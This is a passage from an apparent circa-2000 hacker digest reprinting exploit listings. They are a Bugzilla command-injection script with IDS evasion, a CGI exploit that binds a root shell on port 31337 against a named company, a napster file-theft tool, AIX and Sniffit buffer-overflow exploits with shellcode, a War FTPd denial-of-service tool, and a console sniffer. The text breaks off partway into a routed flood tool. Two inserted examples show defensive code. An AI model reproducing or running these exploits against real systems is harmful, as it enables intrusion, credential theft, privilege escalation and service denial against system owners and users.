$str .= chr(((rand() * 26) % 26) + 97);} # yes, we only use a-z
return $str;}
sub antiIDS {
($url) = (@_);
$url =~s/([-a-zA-Z0-9.\<\>\\\|\'\`])/sprintf("%%%x",ord($1))/ge;
$url =~ s/\ /+/g;
$url =~s/\//\/.\//g;
return $url;
}
#end of stolen stuff
($complete_url, $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV);
print("Exploit for Bugzilla up to version 2.8\n");
print(" by {} - karin\@root66.nl.eu.org\n");
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
print("RooT66 - http://root66.nl.eu.org\n");
print("ShellOracle - http://www.shelloracle.cjb.net\n");
print("b0f - http://b0f.freebsd.lublin.pl\n");
print("\n");
if ($complete_url eq "-h" || $complete_url eq "--help") {
print("Usage: $0 url emailaddress password command\n");
exit;
}
# Get information of user
if (!$complete_url) {
print("URL: ");
$complete_url = <STDIN>; chomp($complete_url); $complete_url =~ s/http:\/\///;
}
if (!$Bugzilla_login) {
print("EMAIL: ");
$Bugzilla_login = <STDIN>; chomp($Bugzilla_login);
}
if (!$Bugzilla_password) {
print("PASSWORD: ");
$Bugzilla_password = <STDIN>; chomp($Bugzilla_password);
}
if (!$command) {
print("COMMAND: ");
$command = <STDIN>; chomp($command);
}
# Set some variables
$host = $complete_url; $host =~ s/\/.*//;
$base_dir = $complete_url; $base_dir =~ s/^$host//; $base_dir =~ s/[a-zA-Z.]*$//;
# Make own directory
system("mkdir $");
print("Getting information needed to submit our 'bug'\n");
# Get product name
system("cd $; lynx -source \"http://$host/" . antiIDS("$base_dir/enter_bug.cgi") . "?Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password") . "\" > enter_bug.cgi");
open(FILE, "< $/enter_bug.cgi");
while($input = <FILE>) {
if ($input =~ /enter_bug.cgi\?product=/) {
chomp($input);
$product = $input;
$product =~ s/.*product=//;
$product =~ s/".*//;
if ($product =~ /\&component=/) {
$component = $product;
$product =~ s/&.*//; # strip component
$component =~ s/.*component=//;
$component =~ s/".*//;
}
}
}
print("\tProduct: $product\n");
if ($component) {
print("\tComponent: $component\n");
}
# Get more information
$page = antiIDS("$base_dir/enter_bug.cgi?") . "product=" . antiIDS("$product") . "&Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password");
system("cd $; lynx -dump \"http://$host/$page\" > enter_bug.cgi");
open(FILE, "< $/enter_bug.cgi");
while($input = <FILE>) {
chomp($input);
if ($input =~ /Reporter:/) {
$reporter = $input;
$reporter =~ s/.*Reporter: //;
$reporter =~ s/\ .*//;
}
if ($input =~ /Version:/) {
$version = $input;
$version =~ s/.*Version: \[//;
$version =~ s/\.*\].*//;
}
if ($input =~ /Component:/) {
$component = $input;
$component =~ s/.*Component: \[//;
$component =~ s/\.*\].*//;
}
if ($input =~ /Platform:/) {
$platform = $input;
$platform =~ s/.*Platform: \[//;
$platform =~ s/\.*\].*//;
}
if ($input =~ /OS:/) {
$os = $input;
$os =~ s/.*OS: \[//;
$os =~ s/\.*\].*//;
}
if ($input =~ /Priority:/) {
$priority = $input;
$priority =~ s/.*Priority: \[//;
$priority =~ s/\].*//;
}
if ($input =~ /Severity:/) {
$severity = $input;
$severity =~ s/.*Severity: \[//;
$severity =~ s/\.*\].*//;
}
}
print("\tReporter: $reporter\n");
print("\tVersion: $version\n");
print("\tComponent: $component\n");
print("\tPlatform: $platform\n");
print("\tOS: $os\n");
print("\tPriority: $priority\n");
print("\tSeverity: $severity\n");
close(FILE);
#liftoff
print("Sending evil bug report\n");
$page = antiIDS("$base_dir/process_bug.cgi") . "?bug_status=" . antiIDS("NEW") . "&reporter=" . antiIDS($reporter) . "&product=" . antiIDS("$product") . "&version=" . antiIDS("$version") . "&component=" . antiIDS("$component") . "&rep_platform=" . antiIDS("$platform") . "&op_sys=" . antiIDS($os) . "&priority=" . antiIDS($priority) . "&bug_severity=" . antiIDS($severity) . "&who=". antiIDS("blaat\@blaat.com;echo \\<pre\\>START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") . "&knob=" . antiIDS("duplicate") . "&dup_id=" . antiIDS("202021234123412341234") . "&Bugzilla_login=" . antiIDS($Bugzilla_login) . "&Bugzilla_password=" . antiIDS($Bugzilla_password) . "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug";
system("cd $; lynx -dump \"$host/$page\" > enter_bug.cgi");
open(FILE, "< $/enter_bug.cgi");
while($input = <FILE>) {
chomp($input);
if ($input =~ /END OUTPUT COMMAND/) {
$startoutput = 0;
}
if ($startoutput) {
print("$input\n");
}
if ($input =~ /START OUTPUT COMMAND/) {
$startoutput = 1;
}
}
close(FILE);
# Delete shit
system("rm -rf $");
# www.hack.co.za [10 May]#
@HWA
262.0 [IND] netsol.c remote cgi exploit by bansh33.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
rishi@felons.org
/*
* [r00tabega.security.labs]
* www.r00tabega.com
* Coded for the network solutions exploit (http://packetstorm.securify.com/0005-exploits/netsolbug.txt)
* Unfortunately, this no longer works.
* coded by bansh33 [rishi@felons.org]
* Binds a shell to port 31337
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <time.h>
#include <sys/time.h>
#include <unistd.h>
#define TRUE 0x00000001
#define FALSE 0x00000000
#define ERR 0xffffffff
typedef long sock_t;
typedef u_long ip_t;
typedef u_short port_t;
#define H1 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%73%79%73%2f%73%6f%63%6b%65%74%2e%68%22%27%20>%20hi.c|"
#define H2 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%6e%65%74%69%6e%65%74%2f%69%6e%2e%68%22%27>>%20hi.c"
#define CODE "GET /cgi-bin/phf?Qalias=x%0aecho%20%27%69%6e%74%20%6d%61%69%6e%28%29%7b%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%5f%69%6e%20%73%61%3b%69%6e%74%20%73%3d%73%6f%63%6b%65%74%28%32%2c%31%2c%30%29%3b%73%61%2e%73%69%6e%5f%61%64%64%72%2e%73%5f%61%64%64%72%3d%30%3b%73%61%2e%73%69%6e%5f%66%61%6d%69%6c%79%3d%32%3b%73%61%2e%73%69%6e%5f%70%6f%72%74%3d%32%37%30%30%32%3b%62%69%6e%64%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%6c%69%73%74%65%6e%28%73%2c%33%29%3b%77%68%69%6c%65%28%31%29%7b%69%6e%74%20%66%64%3d%61%63%63%65%70%74%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%64%75%70%32%28%66%64%2c%30%29%3b%64%75%70%32%28%66%64%2c%31%29%3b%64%75%70%32%28%66%64%2c%32%29%3b%73%79%73%74%65%6d%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%3b%7d%7d%27%20>>hi.c|"
#define COMPILE "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0agcc%20-o%20hi%20hi.c|"
#define THEHACK "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0a%2e%2f%68%69%20|"
#define WHOAMI "uname -a; id;\n"
int main (int, char * *);
void simshell (int);
void send_tcp_conn (char *, ip_t, port_t, int);
sock_t tcp_conn (ip_t, port_t);
ip_t resolve (u_char *);
int main (int argc, char * * argv)
{
sock_t fd;
ip_t ipaddr;
if ((ipaddr = resolve("networksolutions.com")) == ERR)
{
fprintf(stderr, "Couldn't resolve networksolutions.com.\n");
exit(EXIT_SUCCESS);
}
fprintf(stderr, "Network Solutions Exploit by bansh33\n");
fprintf(stderr, "i take no responsibility for this\n\n");
fprintf(stderr, "Owning networksolutions.com: ");
send_tcp_conn(H1, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(H2, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(CODE, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(COMPILE, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(THEHACK, ipaddr, 80, 1);
fprintf(stderr, ".");
fprintf(stderr, "\nDropping you to a shell...\n");
fd = tcp_conn(ipaddr, 31337);
send(fd, WHOAMI, strlen(WHOAMI), 0);
simshell(fd);
}
void simshell (int fd)
{
char buf[255];
fd_set in_set;
while (1)
{
FD_ZERO(&in_set);
FD_SET(0, &in_set);
FD_SET(fd, &in_set);
if ((select(fd + 1, &in_set, 0, 0, NULL)))
{
if (FD_ISSET(fd, &in_set))
{
memset(buf, 0, 255);
recv(fd, buf, 255, 0);
if (!*buf) exit(EXIT_SUCCESS);
fprintf(stderr, buf);
}
else if (FD_ISSET(0, &in_set))
{
memset(buf, 0, 255);
read(0, buf, 255);
send(fd, buf, strlen(buf), 0);
}
}
}
}
void send_tcp_conn (char * buf, ip_t ipaddr, port_t port, int dis)
{
sock_t fd;
if ((fd = tcp_conn(ipaddr, port)) > 0)
send(fd, buf, strlen(buf), 0);
if (!dis) close(fd);
}
sock_t tcp_conn (ip_t addr, port_t port)
{
sock_t ret;
struct sockaddr_in sa;
sa.sin_addr.s_addr = addr;
sa.sin_port = htons(port);
sa.sin_family = AF_INET;
if ((ret = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERR)
return (ERR);
else if ((connect(ret, (struct sockaddr *)&sa, sizeof(struct
sockaddr_in))) == ERR) return (ERR);
return (ret);
}
ip_t resolve (u_char * host)
{
struct in_addr addr;
struct hostent * hp;
if ((addr.s_addr = inet_addr(host)) == ERR)
{
if (!(hp = gethostbyname(host))) return (ERR);
memcpy(&addr.s_addr, hp->h_addr, hp->h_length);
}
return (addr.s_addr);
}
/* EOF */
/* www.hack.co.za [14 May]*/
@HWA
263.0 [IND] napstir.c remote linux misc exploit by S.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
super@udel.edu
/* napstir by Derek Callaway <super@udel.edu> -- S@IRC *
* Exploits a gnapster bug... (probably exists in other clients, too.)
* Greetings: inNUENdo, s0ftpj, napster
* I discovered some service denial techniques while coding; see below.
*/
#include<stdio.h>
#include<stdlib.h>
#include<errno.h>
#include<string.h>
#include<netdb.h>
#include<netinet/in.h>
#include<sys/socket.h>
#include<unistd.h>
#include<ctype.h>
void vexit(const char *func){perror(func);exit(EXIT_FAILURE);}
int main(int argc,char**argv){
int sock,port,len;
struct hostent *he;
char str[4096],buf[4096],*sln,*op,c;
struct sockaddr_in ta;
if(argc<3){
printf("napstir by S\n");
printf("usage: %s host file [port] [username]\n",argv[0]);
printf("example: %s metallica.com ",argv[0]);
printf("\"\\etc\\passwd\" 6699\n");
printf("default port is 6699\n");
printf("default username is Lamer (usually not required)\n");
exit(EXIT_SUCCESS);
}
if(!(he=gethostbyname(argv[1])))vexit("gethostbyname");
ta.sin_family=AF_INET;
ta.sin_addr=*((struct in_addr*)he->h_addr);
if(argv[3]){
port=strtol(argv[3],(char**)0,10);
if(errno==ERANGE)vexit("strtol");
} else port=6699;
ta.sin_port=htons(port);
memset(&ta.sin_zero,0,sizeof(ta.sin_zero));
if((sock=socket(AF_INET,SOCK_STREAM,0))<0)vexit("socket");
if(connect(sock,(struct sockaddr*)&ta,sizeof(struct sockaddr))<0)
vexit("connect");
/* I wonder what this byte is for. */
recv(sock,&buf,1,0);
/* 9 is the code for T1 bitrate -- Most clients ignore the username
* field.
*/
sprintf(str,"%s \"%s\" 9",(argc>=4)?argv[4]:"Lamer",argv[2]);
send(sock,"GET",3,0);
send(sock,(char*)str,strlen(str),0);
/* * SERVICE DENIAL CODE *
* Uncomment this line if you'd like to crash knapster. :-)
* send(sock,"0",1);
*/
if(!(op=sln=(char*)malloc(1024)))vexit("malloc");
do {
read(sock,&c,1);
sprintf(sln,"%c",c);
sln++;
} while(isdigit(c));
*sln=0;
sln=op;
len=strtol(sln,(char**)0,10);
if(errno==ERANGE)vexit("strtol");
write(STDOUT_FILENO,&c,1);
if((port=read(sock,&buf,len-1))<0)vexit("read");
write(STDOUT_FILENO,buf,port);
exit(EXIT_SUCCESS);
}
/* www.hack.co.za [14 May]*/
@HWA
264.0 [IND] SSG-arp.c aix 4.1 local overflow by cripto.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cripto@subterrain.net
/*
* AIX 4.1.4.0 local root /usr/sbin/arp exploit - SSG-arp.c - 06/06/2000
*
* This code is largely from an old AIX mount exploit by Georgi Guninski.
* Tested on a blazing 33Mhz RS/6000 IBM POWERserver 340!
*
* Shouts to bind, xdr, obecian, qwer7y, interrupt, linda, and ur mom.
*
* -cripto <cripto@subterrain.net> .o0-> SSG ROX 2000 !@#$#@! <-0o.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define OFFSET 3580
char prog[100]="/usr/sbin/arp";
char prog2[30]="arp";
extern int execv();
char *createvar(char *name,char *value)
{
char *retval;
int l;
l = strlen(name) + strlen(value) + 4;
if (! (retval = malloc(l)))
{
perror("malloc");
exit(2);
};
strcpy(retval,name);
strcat(retval,"=");
strcat(retval,value);
putenv(retval);
return retval;
}
main(int argc,char **argv,char **env)
{
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET = 0;
int dobuf = 0;
char VAR[30] = "LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg = 1;
int ch;
unsigned int reta;
int corr = 4604;
char *args[4];
char *newenv[8];
int justframes = 1;
int startwith = 0;
mn = 78;
max = 100;
if (argc > 1)
{
corr = atoi(argv[1]);
}
else
{
corr = OFFSET;
}
pt = (unsigned *) &execv;
toc = *(pt+1);
eco = *pt;
if (((mn + strlen((char*)&code) / 4) > max) || (max > MAXBUF))
{
perror("invalid input");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2) = (unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO) = (unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 ) = (unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 ) = (unsigned short) ((eco >> 16) &
0x0000ffff);
reta = startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0] + corr;
for(nop = 0;nop < mn;nop++)
buf[nop] = startwith ? reta : 0x4ffffb82;
strcpy((char*)&buf[nop], (char*)&code);
i = nop + strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");
exit(5);
}
while(i++ < max)
buf[i] = reta;
buf[i] = 0;
for(i = 0;i < max-1;i++)
frame[i] = reta;
frame[i] = 0;
if(QUIET)
{
puts((char*)&buf);
fflush(stdout);
exit(0);
};
newenv[0] = createvar("EGGSHEL", (char*)&buf[0]);
newenv[1] = createvar("EGGSHE2", (char*)&buf[0]);
newenv[2] = createvar("EGGSHE3", (char*)&buf[0]);
newenv[3] = createvar("EGGSHE4", (char*)&buf[0]);
newenv[4] = createvar("DISPLAY", getenv("DISPLAY"));
newenv[5] = VAR[0] ? createvar(VAR,justframes ? (char*)&frame :
(char*)&buf):NULL;
newenv[6] = NULL;
args[0] = prog2;
execve(prog,args,newenv);
perror("execve\n");
}
/* www.hack.co.za [10 May]*/
@HWA
265.0 [IND] warftpd.c win95 remote dos attack by eth0.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* coded by eth0 from buffer0verfl0w */
/* tested by morpha */
/* *NOTE* Original exploit was coded for winbl0wz *NOTE */
/*
Vulnerable:
War FTPd version 1.66x4
War FTPd version 1.67-3
Immune:
War FTPd version 1.67-4
War FTPd version 1.71-0
The buffer overflow seems to occur because the bound
check of the command of MKD/CWD is imperfect. This
means that although anyone can overflow the statically
assigned buffer that stores the requested path, you
cannot overwrite the RET address and therefore it's
impossible to cause War FTPd to execute arbitrary code.
However, it is a simple mechanism for performing a
Denial-of-Service against the server.
Solution:
War FTPd 1.70-1 does fix this problem, but it contains other
vulnerabilities (see our additional information section).
*/
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
#define PASS "PASS eth0@owns.your.ass.com\r\n"
#define LOGIN "USER anonymous\r\n"
int expl0it(char *host)
{
struct hostent *hp;
struct in_addr addr;
struct sockaddr_in s;
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
/* u_char buf[280]; */
int p, i;
hp = gethostbyname (host);
if (!hp) exit (1);
bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
s.sin_port = htons (FTP_PORT);
s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
if(connect (p, &s, sizeof (s))!=0)
{
printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT);
return;
}
else {
printf("Connected!\n");
write(p, LOGIN, strlen(LOGIN));
write(p, PASS, strlen(PASS));
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
sprintf((char *)packetbuf,"CWD %s\r\n",buf);
send(p,(char *)packetbuf,strlen((char *)packetbuf),0);
printf("DONE!\n");
}
return(0);
}
int main(int argc, char *argv[])
{
if(argc<2)
{
printf("Usage: %s [host] \n",argv[0]);
return;
}
else
{
expl0it(argv[1]);
}
return(0);
}
/* www.hack.co.za [10 May]*/
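The advisory text above attributes the crash to an imperfect bound check on the CWD/MKD argument before it is stored in a statically sized path buffer. The following is an added example, not War FTPd source and not part of the original listing, of a command handler that makes that check before copying; the buffer size, the struct and the function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#define FTP_PATH_BUF 256   /* assumed size of the server's fixed path buffer */

struct ftp_session {
    char path[FTP_PATH_BUF];   /* statically sized, as the advisory describes */
};

/* Handle one CWD or MKD command line as read from the control connection.
 * `line` need not be NUL-terminated; `len` is the number of bytes received.
 * Returns the FTP reply code the server should send. */
int handle_path_command(struct ftp_session *s, const char *line, size_t len)
{
    const char *arg;
    size_t arg_len, i;
    int is_cwd, is_mkd;

    /* Strip the CRLF (or bare LF) terminator. */
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;

    if (len < 3) return 500;
    is_cwd = strncasecmp(line, "CWD", 3) == 0;
    is_mkd = strncasecmp(line, "MKD", 3) == 0;
    if (!is_cwd && !is_mkd) return 500;          /* not handled here */
    if (len < 5 || line[3] != ' ') return 501;   /* verb without a path */

    arg = line + 4;
    arg_len = len - 4;

    /* The bound check: compare the argument length with the destination
     * size before copying, leaving room for the terminating NUL. */
    if (arg_len >= sizeof(s->path)) return 501;

    /* Control bytes have no place in a path name. */
    for (i = 0; i < arg_len; i++)
        if ((unsigned char)arg[i] < 0x20 || arg[i] == 0x7f) return 501;

    memcpy(s->path, arg, arg_len);
    s->path[arg_len] = '\0';
    return is_cwd ? 250 : 257;
}

/* Build "<verb> " + n filler bytes + CRLF (constructed input) and return
 * the reply code the handler gives for it. */
int reply_for_path_of_length(const char *verb, size_t n)
{
    struct ftp_session s;
    size_t vlen = strlen(verb);
    char *line = malloc(vlen + 1 + n + 2);
    int code;

    if (!line) return -1;
    memcpy(line, verb, vlen);
    line[vlen] = ' ';
    memset(line + vlen + 1, 'A', n);
    memcpy(line + vlen + 1 + n, "\r\n", 2);
    memset(&s, 0, sizeof s);
    code = handle_path_command(&s, line, vlen + 1 + n + 2);
    free(line);
    return code;
}

int main(void)
{
    /* 8181 is the argument length the listing above sends (MAXBUF - 1). */
    printf("CWD, 255 bytes  -> %d\n", reply_for_path_of_length("CWD", 255));
    printf("CWD, 256 bytes  -> %d\n", reply_for_path_of_length("CWD", 256));
    printf("CWD, 8181 bytes -> %d\n", reply_for_path_of_length("CWD", 8181));
    printf("MKD, 10 bytes   -> %d\n", reply_for_path_of_length("MKD", 10));
    return 0;
}
```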
@HWA
266.0 [IND] sniffit.c remote linux misc overflow by fusys.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.s0ftpj.org/
/*
* Sniffit 0.3.7beta Linux/x86 Remote Exploit
* ShellCode is a modified version of w00w00 write egg,
* to pass Sniffit input filter
*
* Tested on RedHat 5.2, 6.0, 6.2
* Proof Of Concept Code
*
* credits: |CyraX| for pointing me to the coredump
* del0 for hurrying me :)
* vecna for offering me drinks ;P
* belf for loving and caring his GSM ;P
*
* FuSyS [S0ftpj|BFi]
* http://www.s0ftpj.org/
*/
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#include<netdb.h>
#include<netinet/in.h>
#define LENGTH 600
#define RET RH6x
#define RH52 0xbfff5c10
#define RH6x 0xbfff5bb5 // 0.3.6HIP 0xbfffcc50
#define OFFSET 0
#define ALIGNOP 3 // 3 RH6.0, 4 RH6.2
// may vary [1-5]
/* Note To Script Kiddies: This ShellCode Simply Changes An
Existing /etc/motd So Don't Bother DownLoading */
unsigned char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"
"\x30\xe4\x88\x63\x09\x31\xc9\x66\xb9\x01\x04\x31\xd2\x66\xba\xa4"
"\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x3f\x01\xf9\x31"
"\xd2\xb2\x0e\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f"
"\x65\x74\x63\x2f\x6d\x6f\x74\x64\x01\x66\x75\x73\x79\x73\x20\x77"
"\x61\x73\x20\x68\x65\x72\x65\x0a";
unsigned long nameResolve(char *hostname)
{
struct in_addr addr;
struct hostent *hostEnt;
if((addr.s_addr=inet_addr(hostname)) == -1) {
if(!(hostEnt=gethostbyname(hostname))) {
printf("Name Resolution Error:`%s`\n",hostname);
exit(0);
}
bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
}
return addr.s_addr;
}
int main(int argc,char **argv)
{
char buff[LENGTH+ALIGNOP+1];
char cmd[610];
long addr;
unsigned long sp;
int offset=OFFSET;
int i, x;
int sock;
struct sockaddr_in sin;
if(argc<2) {
fprintf(stderr, "Usage: %s <sniffit host>\n", argv[0]);
exit(0);
}
sp=(unsigned long) RET;
addr=sp-offset;
for(i=0;i<120-ALIGNOP;i++)
buff[i]=0x90;
for(x=0; x<strlen(shellcode); i++, x++)
buff[i]=shellcode[x];
for(i-=1 ; i<LENGTH; i+=4) {
buff[i ] = addr & 0x000000ff;
buff[i+1] = (addr & 0x0000ff00) >> 8;
buff[i+2] = (addr & 0x00ff0000) >> 16;
buff[i+3] = (addr & 0xff000000) >> 24;
}
printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n");
printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n");
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_port=htons(25);
sin.sin_addr.s_addr=nameResolve(argv[1]);
printf("Connecting to %s ...\n", argv[1]);
if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Can't create socket\n");
exit(0);
}
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
{
printf("Can't connect to Sniffit Server\n");
exit(0);
}
printf("Injecting ShellCode ...\n");
strncat(cmd, "mail from:", 10);
strncat(cmd, buff, strlen(buff));
write(sock, cmd, strlen(cmd));
printf("Done!\n\n");
return(0);
}
/* www.hack.co.za [10 May]*/
@HWA
267.0 [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
A vulnerability exists in the pam_console PAM module
included as part of any Linux system running PAM.
pam_console exists to own certain devices to users
logging in to the console of a Linux machine.
It is designed to allow only console users to utilize
things such as sound devices. It will chown devices
to users upon logging in, and chown them back to
being owned by root upon logout. However, as certain
devices do not have a 'hangup' mechanism, like a tty
device, it is possible for a local user to continue
to monitor activity on certain devices after logging
out. This could allow a malicious user to sniff
other users' console sessions, and potentially obtain
the root password if the root user logs in or a user
su's to root. They could also surreptitiously execute
commands as the user on the console.
Affected:
RedHat Linux 6.2, 6.1, 6.0
*/
#include <sys/fcntl.h>
main(int argc,char*argv[]) {
char buf[80*24];
int f=open(argv[1],O_RDWR);
while (1) {
lseek(f,0,0);
read(f,buf,sizeof(buf));
write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi
write(1,buf,sizeof(buf));
usleep(10000);
}
}
/* www.hack.co.za [10 May]*/
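The description above comes down to this: changing a device's owner back to root at logout does not revoke file descriptors that were opened while the user owned it. As an added example (not part of the original listing and not pam_console code), here is an audit check for a Linux host that walks /proc and reports processes still holding a given character device open; the function names are hypothetical, and inspecting other users' processes requires root.

```c
#include <ctype.h>
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if `pid` has the character device `device` open, 0 if not,
 * -1 if the device or the process's fd table cannot be examined.
 * Descriptors are matched by device number, not by path name, so a
 * handle opened through another name for the same device still counts. */
int pid_holds_device(pid_t pid, const char *device)
{
    struct stat dev, st;
    char dirpath[64], link[512];
    struct dirent *e;
    DIR *d;
    int held = 0;

    if (stat(device, &dev) != 0 || !S_ISCHR(dev.st_mode)) return -1;
    snprintf(dirpath, sizeof dirpath, "/proc/%ld/fd", (long)pid);
    if (!(d = opendir(dirpath))) return -1;
    while (!held && (e = readdir(d)) != NULL) {
        if (e->d_name[0] == '.') continue;
        snprintf(link, sizeof link, "%s/%s", dirpath, e->d_name);
        if (stat(link, &st) == 0 && S_ISCHR(st.st_mode) &&
            st.st_rdev == dev.st_rdev)
            held = 1;
    }
    closedir(d);
    return held;
}

/* Collect up to `max` PIDs that hold `device` open and are NOT owned by
 * `owner` (the uid the device belongs to now, root after logout).
 * Returns the number found, or -1 if /proc is unavailable. */
int stale_holders(const char *device, uid_t owner, pid_t *out, int max)
{
    DIR *proc = opendir("/proc");
    struct dirent *e;
    int n = 0;

    if (!proc) return -1;
    while (n < max && (e = readdir(proc)) != NULL) {
        char path[64];
        struct stat st;
        pid_t pid;

        if (!isdigit((unsigned char)e->d_name[0])) continue;
        pid = (pid_t)atol(e->d_name);
        snprintf(path, sizeof path, "/proc/%ld", (long)pid);
        if (stat(path, &st) != 0 || st.st_uid == owner) continue;
        if (pid_holds_device(pid, device) == 1) out[n++] = pid;
    }
    closedir(proc);
    return n;
}

/* Self-check: open the device, then confirm the scan sees our own handle. */
int self_holds_after_open(const char *device)
{
    int fd = open(device, O_RDONLY), r;

    if (fd < 0) return -1;
    r = pid_holds_device(getpid(), device);
    close(fd);
    return r;
}

int main(int argc, char **argv)
{
    pid_t pids[64];
    int i, n;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <character device>\n", argv[0]);
        return 2;
    }
    n = stale_holders(argv[1], 0, pids, 64);
    for (i = 0; i < n; i++)
        printf("pid %ld still holds %s\n", (long)pids[i], argv[1]);
    return n > 0;
}
```

Run it from the logout path after ownership has been reset; any PID it prints belongs to a process that should be terminated before the next user logs in at the console.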
@HWA
268.0 [IND] routedsex.c slackware 7 remote dos attack by xt.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
brandon@james.kalifornia.com
/*
routedsex.c by xt of XOR (brandon@james.kalifornia.com)
DoS attack against the routed daemon.
description:
i noticed a while back, when i was screwing with routed, that
RIP packets destined for routed (port 520) caused it to log
an 'unknown router' error to the system log. if i flooded
it with the same spoofed IP address, it would just say that
the last message was logged X times. but, if they're randomly
spoofed, it logs each one. so this causes a DoS attack against
the hard drive space of the system. the syslog will eventually
fill up. run this program a couple of times against a host to
make the system log fill up even quicker. here's an excerpt from
the /var/log/syslog file on my system:
... routed[3067]: packet from unknown router, 45.138.23.14
and many, many, many more.. 800K file so far after 40 seconds
of attacking it.
this has been tested on slackware linux 7.0. should work on all
linux, may need a couple of tweaks to compile on some distributions,
such as the ever so crappy RedHat and its clones (i *HATE* redhat).
anyways, have fun. btw, XOR is looking for more members.. if you're
interested in joining, read http://xorteam.cjb.net.
- xt
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
